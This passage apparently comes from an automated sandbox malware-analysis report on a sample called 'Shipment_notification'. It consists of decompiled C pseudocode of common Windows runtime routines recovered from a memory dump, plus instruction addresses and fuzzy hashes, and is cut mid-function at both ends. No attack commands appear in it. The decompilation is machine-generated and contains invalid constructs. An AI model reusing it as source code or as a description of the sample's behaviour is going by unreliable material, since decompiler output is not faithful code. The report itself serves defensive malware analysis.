											L26:
											__eflags = _t193;
											if(_t193 < 0) {
												E01B237F5( *((intOrPtr*)(_t237 - 0x5c)), _t237 - 0x6c);
												__eflags =  *((char*)(_t237 - 0x39));
												if( *((char*)(_t237 - 0x39)) != 0) {
													 *0x1bd7b10 =  *0x1bd7b10 - 8;
												}
											} else {
												_t169 =  *(_t237 - 0x68);
												__eflags = _t169;
												if(_t169 != 0) {
													 *0x1bd7b04 =  *0x1bd7b04 - _t169;
												}
											}
											__eflags = _t193;
											if(_t193 >= 0) {
												 *((short*)( *((intOrPtr*)(_t237 - 0x5c)) + 0x3a)) = 0xffff;
											}
											goto L30;
										}
										_t226 = _t206 * 0xc;
										__eflags = _t226;
										_t194 =  *(_t237 - 0x48);
										do {
											 *(_t237 - 0x40) = _t206 - 1;
											_t226 = _t226 - 0xc;
											 *(_t237 - 0x4c) = _t226;
											__eflags =  *(_t235 + _t226 + 0x10) & 0x00000002;
											if(( *(_t235 + _t226 + 0x10) & 0x00000002) == 0) {
												__eflags =  *(_t235 + _t226 + 0x10) & 0x00000001;
												if(( *(_t235 + _t226 + 0x10) & 0x00000001) == 0) {
													 *(_t237 - 0x68) =  *(_t237 - 0x68) + 1;
													_t210 =  *(_t226 +  *(_t237 - 0x64) + 0x14);
													__eflags =  *((char*)(_t237 - 0x39));
													if( *((char*)(_t237 - 0x39)) == 0) {
														_t171 = _t210;
													} else {
														 *(_t237 - 0x50) =  *(_t210 +  *(_t237 - 0x58) * 4);
														L01B077F0(_t194, _t236, _t210 - 8);
														_t171 =  *(_t237 - 0x50);
													}
													L48:
													L01B077F0(_t194, _t236,  *((intOrPtr*)(_t171 - 4)));
													L46:
													_t206 =  *(_t237 - 0x40);
													_t226 =  *(_t237 - 0x4c);
													goto L24;
												}
												 *0x1bd7b08 =  *0x1bd7b08 + 1;
												goto L24;
											}
											_t171 =  *(_t226 +  *(_t237 - 0x64) + 0x14);
											__eflags = _t171;
											if(_t171 != 0) {
												__eflags =  *((char*)(_t237 - 0x39));
												if( *((char*)(_t237 - 0x39)) == 0) {
													goto L48;
												}
												E01B257C2(_t171,  *((intOrPtr*)(_t235 + _t226 + 0x18)));
												goto L46;
											}
											L24:
											__eflags = _t206;
										} while (_t206 != 0);
										_t193 =  *(_t237 - 0x44);
										goto L26;
									}
									_t232 =  *(_t237 - 0x70) + 0x00000001 + _t214 &  !( *(_t237 - 0x70));
									 *(_t237 - 0x7c) = _t232;
									 *(_t232 - 4) = _t214;
									 *(_t237 - 4) = _t236;
									E01B2F3E0(_t232,  *((intOrPtr*)( *((intOrPtr*)(_t237 - 0x74)) + 8)),  *((intOrPtr*)(_t237 - 0x54)));
									_t238 = _t238 + 0xc;
									 *(_t237 - 4) = 0xfffffffe;
									_t215 =  *(_t237 - 0x48);
									__eflags = _t193;
									if(_t193 < 0) {
										L01B077F0(_t215, _t236,  *(_t237 - 0x78));
										goto L20;
									}
									__eflags =  *((char*)(_t237 - 0x39));
									if( *((char*)(_t237 - 0x39)) != 0) {
										_t233 = E01B1A44B( *(_t237 - 0x4c));
										 *(_t237 - 0x50) = _t233;
										__eflags = _t233;
										if(_t233 == 0) {
											L01B077F0( *(_t237 - 0x48), _t236,  *(_t237 - 0x78));
											goto L52;
										}
										 *(_t233 +  *(_t237 - 0x58) * 4) =  *(_t237 - 0x7c);
										L17:
										_t234 =  *(_t237 - 0x40);
										_t218 = _t234 * 0xc;
										 *(_t218 +  *(_t237 - 0x64) + 0x14) =  *(_t237 - 0x50);
										 *(_t218 + _t235 + 0x10) = _t236;
										_t224 = _t234 + 1;
										 *(_t237 - 0x40) = _t224;
										 *(_t237 - 0x50) = _t224;
										_t193 =  *(_t237 - 0x44);
										continue;
									}
									 *(_t237 - 0x50) =  *(_t237 - 0x7c);
									goto L17;
								}
								 *_t235 = _t236;
								_t165 = 0x10 + _t163 * 0xc;
								__eflags = _t165;
								_push(_t165);
								_push(_t235);
								_push(0x23);
								_push(0xffffffff);
								_t193 = L01B296C0();
								goto L19;
							} else {
								goto L50;
							}
						}
						_t235 = _t237 - 0x38;
						 *(_t237 - 0x60) = _t235;
						goto L8;
					}
					goto L4;
				}
			}

































                                                                                0x01af849b
                                                                                0x01af849b
                                                                                0x01af849b
                                                                                0x01af849b
                                                                                0x01af849d
                                                                                0x01af84a2
                                                                                0x01af84a7
                                                                                0x01af84b1
                                                                                0x01af84d8
                                                                                0x00000000
                                                                                0x01af84b3
                                                                                0x01af84c4
                                                                                0x01af84c9
                                                                                0x01af84cd
                                                                                0x01af84cf
                                                                                0x01af84cf
                                                                                0x01af84d6
                                                                                0x01af84e6
                                                                                0x01af84e9
                                                                                0x01af84ec
                                                                                0x01af84ef
                                                                                0x01af84f2
                                                                                0x01af84f4
                                                                                0x01af84fc
                                                                                0x01af8501
                                                                                0x01af8506
                                                                                0x01af8509
                                                                                0x01af86e0
                                                                                0x01af86e5
                                                                                0x01af86e8
                                                                                0x01af86ed
                                                                                0x01af86f0
                                                                                0x01af86f2
                                                                                0x01b49afd
                                                                                0x01b49b02
                                                                                0x01af84da
                                                                                0x01af84df
                                                                                0x01af84df
                                                                                0x01af86fa
                                                                                0x01af86fd
                                                                                0x01af86fe
                                                                                0x01af8701
                                                                                0x01af8706
                                                                                0x01af8709
                                                                                0x01af870b
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x01af8711
                                                                                0x01af8725
                                                                                0x01af8727
                                                                                0x01af872a
                                                                                0x01af872c
                                                                                0x01b49af0
                                                                                0x01b49af5
                                                                                0x01af8732
                                                                                0x01af8732
                                                                                0x01af8732
                                                                                0x01af8735
                                                                                0x01af8737
                                                                                0x01af8515
                                                                                0x01af8515
                                                                                0x01af8518
                                                                                0x01af851d
                                                                                0x01af8523
                                                                                0x01af8527
                                                                                0x01af852b
                                                                                0x01af8537
                                                                                0x01af8539
                                                                                0x01af853c
                                                                                0x01af853e
                                                                                0x01af868c
                                                                                0x01af8691
                                                                                0x01af8699
                                                                                0x01af869b
                                                                                0x01af8744
                                                                                0x01af8748
                                                                                0x01af86a1
                                                                                0x01af86a1
                                                                                0x01af86a1
                                                                                0x01af86a4
                                                                                0x01af86a8
                                                                                0x01b49bdf
                                                                                0x01b49bdf
                                                                                0x01af86ae
                                                                                0x01af86b0
                                                                                0x00000000
                                                                                0x01af86b6
                                                                                0x00000000
                                                                                0x01b49be9
                                                                                0x01af86b0
                                                                                0x01af8544
                                                                                0x01af854a
                                                                                0x01af854d
                                                                                0x01af8551
                                                                                0x01af876e
                                                                                0x01af8778
                                                                                0x01af877b
                                                                                0x01af8780
                                                                                0x01af8557
                                                                                0x01af8557
                                                                                0x01af855d
                                                                                0x01af855d
                                                                                0x01af856b
                                                                                0x01af856e
                                                                                0x01af8570
                                                                                0x01af8573
                                                                                0x01af8576
                                                                                0x01af8576
                                                                                0x01af8579
                                                                                0x01af857b
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x01af8581
                                                                                0x01af85a0
                                                                                0x01af85a2
                                                                                0x01af85a5
                                                                                0x01af85a7
                                                                                0x01b49b1b
                                                                                0x01b49b1b
                                                                                0x01af862e
                                                                                0x01af862e
                                                                                0x01af8631
                                                                                0x01af8631
                                                                                0x01af8634
                                                                                0x01af8636
                                                                                0x01af8669
                                                                                0x01af8669
                                                                                0x01af866b
                                                                                0x01b49bbf
                                                                                0x01b49bc4
                                                                                0x01b49bc8
                                                                                0x01b49bce
                                                                                0x01b49bce
                                                                                0x01af8671
                                                                                0x01af8671
                                                                                0x01af8674
                                                                                0x01af8676
                                                                                0x01b49bae
                                                                                0x01b49bae
                                                                                0x01af8676
                                                                                0x01af867c
                                                                                0x01af867e
                                                                                0x01af8688
                                                                                0x01af8688
                                                                                0x00000000
                                                                                0x01af867e
                                                                                0x01af8638
                                                                                0x01af8638
                                                                                0x01af863b
                                                                                0x01af863e
                                                                                0x01af863f
                                                                                0x01af8642
                                                                                0x01af8645
                                                                                0x01af8648
                                                                                0x01af864d
                                                                                0x01b49b69
                                                                                0x01b49b6e
                                                                                0x01b49b7b
                                                                                0x01b49b81
                                                                                0x01b49b85
                                                                                0x01b49b89
                                                                                0x01b49ba7
                                                                                0x01b49b8b
                                                                                0x01b49b91
                                                                                0x01b49b9a
                                                                                0x01b49b9f
                                                                                0x01b49b9f
                                                                                0x01af8788
                                                                                0x01af878d
                                                                                0x01af8763
                                                                                0x01af8763
                                                                                0x01af8766
                                                                                0x00000000
                                                                                0x01af8766
                                                                                0x01b49b70
                                                                                0x00000000
                                                                                0x01b49b70
                                                                                0x01af8656
                                                                                0x01af865a
                                                                                0x01af865c
                                                                                0x01af8752
                                                                                0x01af8756
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x01af875e
                                                                                0x00000000
                                                                                0x01af875e
                                                                                0x01af8662
                                                                                0x01af8662
                                                                                0x01af8662
                                                                                0x01af8666
                                                                                0x00000000
                                                                                0x01af8666
                                                                                0x01af85b7
                                                                                0x01af85b9
                                                                                0x01af85bc
                                                                                0x01af85bf
                                                                                0x01af85cc
                                                                                0x01af85d1
                                                                                0x01af85d4
                                                                                0x01af85db
                                                                                0x01af85de
                                                                                0x01af85e0
                                                                                0x01b49b5f
                                                                                0x00000000
                                                                                0x01b49b5f
                                                                                0x01af85e6
                                                                                0x01af85ea
                                                                                0x01af86c3
                                                                                0x01af86c5
                                                                                0x01af86c8
                                                                                0x01af86ca
                                                                                0x01b49b16
                                                                                0x00000000
                                                                                0x01b49b16
                                                                                0x01af86d6
                                                                                0x01af85f6
                                                                                0x01af85f6
                                                                                0x01af85f9
                                                                                0x01af8602
                                                                                0x01af8606
                                                                                0x01af860a
                                                                                0x01af860b
                                                                                0x01af860e
                                                                                0x01af8611
                                                                                0x00000000
                                                                                0x01af8611
                                                                                0x01af85f3
                                                                                0x00000000
                                                                                0x01af85f3
                                                                                0x01af8619
                                                                                0x01af861e
                                                                                0x01af861e
                                                                                0x01af8621
                                                                                0x01af8622
                                                                                0x01af8623
                                                                                0x01af8625
                                                                                0x01af862c
                                                                                0x00000000
                                                                                0x01af873d
                                                                                0x00000000
                                                                                0x01af873d
                                                                                0x01af8737
                                                                                0x01af850f
                                                                                0x01af8512
                                                                                0x00000000
                                                                                0x01af8512
                                                                                0x00000000
                                                                                0x01af84d6

                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.378214888.0000000001AC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01AC0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_1ac0000_Shipment_notification.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: f99fcff250d99b2a184d98aaebb935047715177d7bbc72a56cfdbc73c71df0a9
                                                                                • Instruction ID: d786d3b21bb1e7245217d6363f6e1d24ffdcaafe2670cc752f55f2f907db4f7e
                                                                                • Opcode Fuzzy Hash: f99fcff250d99b2a184d98aaebb935047715177d7bbc72a56cfdbc73c71df0a9
                                                                                • Instruction Fuzzy Hash: 95B15A70E00209DFDF29DFE9C994AAEBBB5FF48304F14816DE605AB245DB74A845CB90
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 01B1513A Relevance: .3, Instructions: 258COMMON
                                                                                Download Yara Rule
                                                                                C-Code - Quality: 67%
                                                                                			E01B1513A(intOrPtr __ecx, void* __edx) {
				signed int _v8;
				signed char _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				char _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				intOrPtr _v44;
				intOrPtr _v48;
				char _v63;
				char _v64;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _v84;
				signed int _v88;
				signed char* _v92;
				signed int _v100;
				signed int _v104;
				char _v105;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* _t157;
				signed int _t159;
				signed int _t160;
				unsigned int* _t161;
				intOrPtr _t165;
				signed int _t172;
				signed char* _t181;
				intOrPtr _t189;
				intOrPtr* _t200;
				signed int _t202;
				signed int _t203;
				char _t204;
				signed int _t207;
				signed int _t208;
				void* _t209;
				intOrPtr _t210;
				signed int _t212;
				signed int _t214;
				signed int _t221;
				signed int _t222;
				signed int _t226;
				intOrPtr* _t232;
				signed int _t233;
				signed int _t234;
				intOrPtr _t237;
				intOrPtr _t238;
				intOrPtr _t240;
				void* _t245;
				signed int _t246;
				signed int _t247;
				void* _t248;
				void* _t251;
				void* _t252;
				signed int _t253;
				signed int _t255;
				signed int _t256;

				_t255 = (_t253 & 0xfffffff8) - 0x6c;
				_v8 =  *0x1bdd360 ^ _t255;
				_v32 = _v32 & 0x00000000;
				_t251 = __edx;
				_t237 = __ecx;
				_t212 = 6;
				_t245 =  &_v84;
				_t207 =  *((intOrPtr*)(__ecx + 0x48));
				_v44 =  *((intOrPtr*)(__edx + 0xc8));
				_v48 = __ecx;
				_v36 = _t207;
				_t157 = memset(_t245, 0, _t212 << 2);
				_t256 = _t255 + 0xc;
				_t246 = _t245 + _t212;
				if(_t207 == 2) {
					_t247 =  *(_t237 + 0x60);
					_t208 =  *(_t237 + 0x64);
					_v63 =  *((intOrPtr*)(_t237 + 0x4c));
					_t159 =  *((intOrPtr*)(_t237 + 0x58));
					_v104 = _t159;
					_v76 = _t159;
					_t160 =  *((intOrPtr*)(_t237 + 0x5c));
					_v100 = _t160;
					_v72 = _t160;
					L19:
					_v80 = _t208;
					_v84 = _t247;
					L8:
					_t214 = 0;
					if( *(_t237 + 0x74) > 0) {
						_t82 = _t237 + 0x84; // 0x124
						_t161 = _t82;
						_v92 = _t161;
						while( *_t161 >> 0x1f != 0) {
							_t200 = _v92;
							if( *_t200 == 0x80000000) {
								break;
							}
							_t214 = _t214 + 1;
							_t161 = _t200 + 0x10;
							_v92 = _t161;
							if(_t214 <  *(_t237 + 0x74)) {
								continue;
							}
							goto L9;
						}
						_v88 = _t214 << 4;
						_v40 = _t237 +  *((intOrPtr*)(_v88 + _t237 + 0x78));
						_t165 = 0;
						asm("adc eax, [ecx+edx+0x7c]");
						_v24 = _t165;
						_v28 = _v40;
						_v20 =  *((intOrPtr*)(_v88 + _t237 + 0x80));
						_t221 = _v40;
						_v16 =  *_v92;
						_v32 =  &_v28;
						if( *(_t237 + 0x4e) >> 0xf == 0) {
							goto L9;
						}
						_t240 = _v48;
						if( *_v92 != 0x80000000) {
							goto L9;
						}
						 *((intOrPtr*)(_t221 + 8)) = 0;
						 *((intOrPtr*)(_t221 + 0xc)) = 0;
						 *((intOrPtr*)(_t221 + 0x14)) = 0;
						 *((intOrPtr*)(_t221 + 0x10)) = _v20;
						_t226 = 0;
						_t181 = _t251 + 0x66;
						_v88 = 0;
						_v92 = _t181;
						do {
							if( *((char*)(_t181 - 2)) == 0) {
								goto L31;
							}
							_t226 = _v88;
							if(( *_t181 & 0x000000ff) == ( *(_t240 + 0x4e) & 0x7fff)) {
								_t181 = E01B2D0F0(1, _t226 + 0x20, 0);
								_t226 = _v40;
								 *(_t226 + 8) = _t181;
								 *((intOrPtr*)(_t226 + 0xc)) = 0;
								L34:
								if(_v44 == 0) {
									goto L9;
								}
								_t210 = _v44;
								_t127 = _t210 + 0x1c; // 0x1c
								_t249 = _t127;
								E01B02280(_t181, _t127);
								 *(_t210 + 0x20) =  *( *[fs:0x18] + 0x24);
								_t185 =  *((intOrPtr*)(_t210 + 0x94));
								if( *((intOrPtr*)(_t210 + 0x94)) != 0) {
									L01B077F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t185);
								}
								_t189 = L01B04620(_t226,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _v20 + 0x10);
								 *((intOrPtr*)(_t210 + 0x94)) = _t189;
								if(_t189 != 0) {
									 *((intOrPtr*)(_t189 + 8)) = _v20;
									 *( *((intOrPtr*)(_t210 + 0x94)) + 0xc) = _v16;
									_t232 =  *((intOrPtr*)(_t210 + 0x94));
									 *_t232 = _t232 + 0x10;
									 *(_t232 + 4) =  *(_t232 + 4) & 0x00000000;
									E01B2F3E0( *((intOrPtr*)( *((intOrPtr*)(_t210 + 0x94)))), _v28, _v20);
									_t256 = _t256 + 0xc;
								}
								 *(_t210 + 0x20) =  *(_t210 + 0x20) & 0x00000000;
								E01AFFFB0(_t210, _t249, _t249);
								_t222 = _v76;
								_t172 = _v80;
								_t208 = _v84;
								_t247 = _v88;
								L10:
								_t238 =  *((intOrPtr*)(_t251 + 0x1c));
								_v44 = _t238;
								if(_t238 != 0) {
									 *0x1bdb1e0(_v48 + 0x38, _v36, _v63, _t172, _t222, _t247, _t208, _v32,  *((intOrPtr*)(_t251 + 0x20)));
									_v44();
								}
								_pop(_t248);
								_pop(_t252);
								_pop(_t209);
								return L01B2B640(0, _t209, _v8 ^ _t256, _t238, _t248, _t252);
							}
							_t181 = _v92;
							L31:
							_t226 = _t226 + 1;
							_t181 =  &(_t181[0x18]);
							_v88 = _t226;
							_v92 = _t181;
						} while (_t226 < 4);
						goto L34;
					}
					L9:
					_t172 = _v104;
					_t222 = _v100;
					goto L10;
				}
				_t247 = _t246 | 0xffffffff;
				_t208 = _t247;
				_v84 = _t247;
				_v80 = _t208;
				if( *((intOrPtr*)(_t251 + 0x4c)) == _t157) {
					_t233 = _v72;
					_v105 = _v64;
					_t202 = _v76;
				} else {
					_t204 =  *((intOrPtr*)(_t251 + 0x4d));
					_v105 = 1;
					if(_v63 <= _t204) {
						_v63 = _t204;
					}
					_t202 = _v76 |  *(_t251 + 0x40);
					_t233 = _v72 |  *(_t251 + 0x44);
					_t247 =  *(_t251 + 0x38);
					_t208 =  *(_t251 + 0x3c);
					_v76 = _t202;
					_v72 = _t233;
					_v84 = _t247;
					_v80 = _t208;
				}
				_v104 = _t202;
				_v100 = _t233;
				if( *((char*)(_t251 + 0xc4)) != 0) {
					_t237 = _v48;
					_v105 = 1;
					if(_v63 <=  *((intOrPtr*)(_t251 + 0xc5))) {
						_v63 =  *((intOrPtr*)(_t251 + 0xc5));
						_t237 = _v48;
					}
					_t203 = _t202 |  *(_t251 + 0xb8);
					_t234 = _t233 |  *(_t251 + 0xbc);
					_t247 = _t247 &  *(_t251 + 0xb0);
					_t208 = _t208 &  *(_t251 + 0xb4);
					_v104 = _t203;
					_v76 = _t203;
					_v100 = _t234;
					_v72 = _t234;
					_v84 = _t247;
					_v80 = _t208;
				}
				if(_v105 == 0) {
					_v36 = _v36 & 0x00000000;
					_t208 = 0;
					_t247 = 0;
					 *(_t237 + 0x74) =  *(_t237 + 0x74) & 0;
					goto L19;
				} else {
					_v36 = 1;
					goto L8;
				}
			}































































                                                                                0x01b15142
                                                                                0x01b1514c
                                                                                0x01b15150
                                                                                0x01b15157
                                                                                0x01b15159
                                                                                0x01b1515e
                                                                                0x01b15165
                                                                                0x01b15169
                                                                                0x01b1516c
                                                                                0x01b15172
                                                                                0x01b15176
                                                                                0x01b1517a
                                                                                0x01b1517a
                                                                                0x01b1517a
                                                                                0x01b1517f
                                                                                0x01b56d8b
                                                                                0x01b56d8e
                                                                                0x01b56d91
                                                                                0x01b56d95
                                                                                0x01b56d98
                                                                                0x01b56d9c
                                                                                0x01b56da0
                                                                                0x01b56da3
                                                                                0x01b56da7
                                                                                0x01b56e26
                                                                                0x01b56e26
                                                                                0x01b56e2a
                                                                                0x01b151f9
                                                                                0x01b151f9
                                                                                0x01b151fe
                                                                                0x01b56e33
                                                                                0x01b56e33
                                                                                0x01b56e39
                                                                                0x01b56e3d
                                                                                0x01b56e46
                                                                                0x01b56e50
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x01b56e52
                                                                                0x01b56e53
                                                                                0x01b56e56
                                                                                0x01b56e5d
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x01b56e5f
                                                                                0x01b56e67
                                                                                0x01b56e77
                                                                                0x01b56e7f
                                                                                0x01b56e80
                                                                                0x01b56e88
                                                                                0x01b56e90
                                                                                0x01b56e9f
                                                                                0x01b56ea5
                                                                                0x01b56ea9
                                                                                0x01b56eb1
                                                                                0x01b56ebf
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x01b56ecf
                                                                                0x01b56ed3
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x01b56edb
                                                                                0x01b56ede
                                                                                0x01b56ee1
                                                                                0x01b56ee8
                                                                                0x01b56eeb
                                                                                0x01b56eed
                                                                                0x01b56ef0
                                                                                0x01b56ef4
                                                                                0x01b56ef8
                                                                                0x01b56efc
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x01b56f0d
                                                                                0x01b56f11
                                                                                0x01b56f32
                                                                                0x01b56f37
                                                                                0x01b56f3b
                                                                                0x01b56f3e
                                                                                0x01b56f41
                                                                                0x01b56f46
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x01b56f4c
                                                                                0x01b56f50
                                                                                0x01b56f50
                                                                                0x01b56f54
                                                                                0x01b56f62
                                                                                0x01b56f65
                                                                                0x01b56f6d
                                                                                0x01b56f7b
                                                                                0x01b56f7b
                                                                                0x01b56f93
                                                                                0x01b56f98
                                                                                0x01b56fa0
                                                                                0x01b56fa6
                                                                                0x01b56fb3
                                                                                0x01b56fb6
                                                                                0x01b56fbf
                                                                                0x01b56fc1
                                                                                0x01b56fd5
                                                                                0x01b56fda
                                                                                0x01b56fda
                                                                                0x01b56fdd
                                                                                0x01b56fe2
                                                                                0x01b56fe7
                                                                                0x01b56feb
                                                                                0x01b56fef
                                                                                0x01b56ff3
                                                                                0x01b1520c
                                                                                0x01b1520c
                                                                                0x01b1520f
                                                                                0x01b15215
                                                                                0x01b15234
                                                                                0x01b1523a
                                                                                0x01b1523a
                                                                                0x01b15244
                                                                                0x01b15245
                                                                                0x01b15246
                                                                                0x01b15251
                                                                                0x01b15251
                                                                                0x01b56f13
                                                                                0x01b56f17
                                                                                0x01b56f17
                                                                                0x01b56f18
                                                                                0x01b56f1b
                                                                                0x01b56f1f
                                                                                0x01b56f23
                                                                                0x00000000
                                                                                0x01b56f28
                                                                                0x01b15204
                                                                                0x01b15204
                                                                                0x01b15208
                                                                                0x00000000
                                                                                0x01b15208
                                                                                0x01b15185
                                                                                0x01b15188
                                                                                0x01b1518a
                                                                                0x01b1518e
                                                                                0x01b15195
                                                                                0x01b56db1
                                                                                0x01b56db5
                                                                                0x01b56db9
                                                                                0x01b1519b
                                                                                0x01b1519b
                                                                                0x01b1519e
                                                                                0x01b151a7
                                                                                0x01b151a9
                                                                                0x01b151a9
                                                                                0x01b151b5
                                                                                0x01b151b8
                                                                                0x01b151bb
                                                                                0x01b151be
                                                                                0x01b151c1
                                                                                0x01b151c5
                                                                                0x01b151c9
                                                                                0x01b151cd
                                                                                0x01b151cd
                                                                                0x01b151d8
                                                                                0x01b151dc
                                                                                0x01b151e0
                                                                                0x01b56dcc
                                                                                0x01b56dd0
                                                                                0x01b56dd5
                                                                                0x01b56ddd
                                                                                0x01b56de1
                                                                                0x01b56de1
                                                                                0x01b56de5
                                                                                0x01b56deb
                                                                                0x01b56df1
                                                                                0x01b56df7
                                                                                0x01b56dfd
                                                                                0x01b56e01
                                                                                0x01b56e05
                                                                                0x01b56e09
                                                                                0x01b56e0d
                                                                                0x01b56e11
                                                                                0x01b56e11
                                                                                0x01b151eb
                                                                                0x01b56e1a
                                                                                0x01b56e1f
                                                                                0x01b56e21
                                                                                0x01b56e23
                                                                                0x00000000
                                                                                0x01b151f1
                                                                                0x01b151f1
                                                                                0x00000000
                                                                                0x01b151f1

                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.378214888.0000000001AC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01AC0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_1ac0000_Shipment_notification.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 180cdcc15b7dcfe14b29e39cea21ba461af1a74e77a42631cbedc52d6d785c0c
                                                                                • Instruction ID: 8460b24e9c44464471fb378fec61d40b9baa05f8ab2d3c6e57be6615a2da881b
                                                                                • Opcode Fuzzy Hash: 180cdcc15b7dcfe14b29e39cea21ba461af1a74e77a42631cbedc52d6d785c0c
                                                                                • Instruction Fuzzy Hash: DAC131755093818FD369CF28C480A5AFBE1FF89304F544AAEF9998B352D730E845CB82
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 01B103E2 Relevance: .3, Instructions: 254COMMON
                                                                                Download Yara Rule
                                                                                C-Code - Quality: 74%
                                                                                			E01B103E2(signed int __ecx, signed int __edx) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				intOrPtr _v40;
				signed int _v44;
				signed int _v48;
				char _v52;
				char _v56;
				char _v64;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t56;
				signed int _t58;
				char* _t64;
				intOrPtr _t65;
				signed int _t74;
				signed int _t79;
				char* _t83;
				intOrPtr _t84;
				signed int _t93;
				signed int _t94;
				signed char* _t95;
				signed int _t99;
				signed int _t100;
				signed char* _t101;
				signed int _t105;
				signed int _t119;
				signed int _t120;
				void* _t122;
				signed int _t123;
				signed int _t127;

				_v8 =  *0x1bdd360 ^ _t127;
				_t119 = __ecx;
				_t105 = __edx;
				_t118 = 0;
				_v20 = __edx;
				_t120 =  *(__ecx + 0x20);
				if(E01B10548(__ecx, 0) != 0) {
					_t56 = 0xc000022d;
					L23:
					return L01B2B640(_t56, _t105, _v8 ^ _t127, _t118, _t119, _t120);
				} else {
					_v12 = _v12 | 0xffffffff;
					_t58 = _t120 + 0x24;
					_t109 =  *(_t120 + 0x18);
					_t118 = _t58;
					_v16 = _t58;
					E01AFB02A( *(_t120 + 0x18), _t118, 0x14a5);
					_v52 = 0x18;
					_v48 = 0;
					0x840 = 0x40;
					if( *0x1bd7c1c != 0) {
					}
					_v40 = 0x840;
					_v44 = _t105;
					_v36 = 0;
					_v32 = 0;
					if(E01B07D50() != 0) {
						_t64 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
					} else {
						_t64 = 0x7ffe0384;
					}
					if( *_t64 != 0) {
						_t65 =  *[fs:0x30];
						__eflags =  *(_t65 + 0x240) & 0x00000004;
						if(( *(_t65 + 0x240) & 0x00000004) != 0) {
							_t100 = E01B07D50();
							__eflags = _t100;
							if(_t100 == 0) {
								_t101 = 0x7ffe0385;
							} else {
								_t101 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
							}
							__eflags =  *_t101 & 0x00000020;
							if(( *_t101 & 0x00000020) != 0) {
								_t118 = _t118 | 0xffffffff;
								_t109 = 0x1485;
								E01B67016(0x1485, _t118, 0xffffffff, 0xffffffff, 0, 0);
							}
						}
					}
					_t105 = 0;
					while(1) {
						_push(0x60);
						_push(5);
						_push( &_v64);
						_push( &_v52);
						_push(0x100021);
						_push( &_v12);
						_t122 = E01B29830();
						if(_t122 >= 0) {
							break;
						}
						__eflags = _t122 - 0xc0000034;
						if(_t122 == 0xc0000034) {
							L38:
							_t120 = 0xc0000135;
							break;
						}
						__eflags = _t122 - 0xc000003a;
						if(_t122 == 0xc000003a) {
							goto L38;
						}
						__eflags = _t122 - 0xc0000022;
						if(_t122 != 0xc0000022) {
							break;
						}
						__eflags = _t105;
						if(__eflags != 0) {
							break;
						}
						_t109 = _t119;
						_t99 = E01B669A6(_t119, __eflags);
						__eflags = _t99;
						if(_t99 == 0) {
							break;
						}
						_t105 = _t105 + 1;
					}
					if( !_t120 >= 0) {
						L22:
						_t56 = _t120;
						goto L23;
					}
					if( *0x1bd7c04 != 0) {
						_t118 = _v12;
						_t120 = E01B6A7AC(_t119, _t118, _t109);
						__eflags = _t120;
						if(_t120 >= 0) {
							goto L10;
						}
						__eflags =  *0x1bd7bd8;
						if( *0x1bd7bd8 != 0) {
							L20:
							if(_v12 != 0xffffffff) {
								_push(_v12);
								E01B295D0();
							}
							goto L22;
						}
					}
					L10:
					_push(_v12);
					_t105 = _t119 + 0xc;
					_push(0x1000000);
					_push(0x10);
					_push(0);
					_push(0);
					_push(0xf);
					_push(_t105);
					_t120 = E01B299A0();
					if(_t120 < 0) {
						__eflags = _t120 - 0xc000047e;
						if(_t120 == 0xc000047e) {
							L51:
							_t74 = E01B63540(_t120);
							_t119 = _v16;
							_t120 = _t74;
							L52:
							_t118 = 0x1485;
							E01AEB1E1(_t120, 0x1485, 0, _t119);
							goto L20;
						}
						__eflags = _t120 - 0xc000047f;
						if(_t120 == 0xc000047f) {
							goto L51;
						}
						__eflags = _t120 - 0xc0000462;
						if(_t120 == 0xc0000462) {
							goto L51;
						}
						_t119 = _v16;
						__eflags = _t120 - 0xc0000017;
						if(_t120 != 0xc0000017) {
							__eflags = _t120 - 0xc000009a;
							if(_t120 != 0xc000009a) {
								__eflags = _t120 - 0xc000012d;
								if(_t120 != 0xc000012d) {
									_v28 = _t119;
									_push( &_v56);
									_push(1);
									_v24 = _t120;
									_push( &_v28);
									_push(1);
									_push(2);
									_push(0xc000007b);
									_t79 = E01B2AAF0();
									__eflags = _t79;
									if(_t79 >= 0) {
										__eflags =  *0x1bd8474 - 3;
										if( *0x1bd8474 != 3) {
											 *0x1bd79dc =  *0x1bd79dc + 1;
										}
									}
								}
							}
						}
						goto L52;
					}
					if(E01B07D50() != 0) {
						_t83 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
					} else {
						_t83 = 0x7ffe0384;
					}
					if( *_t83 != 0) {
						_t84 =  *[fs:0x30];
						__eflags =  *(_t84 + 0x240) & 0x00000004;
						if(( *(_t84 + 0x240) & 0x00000004) != 0) {
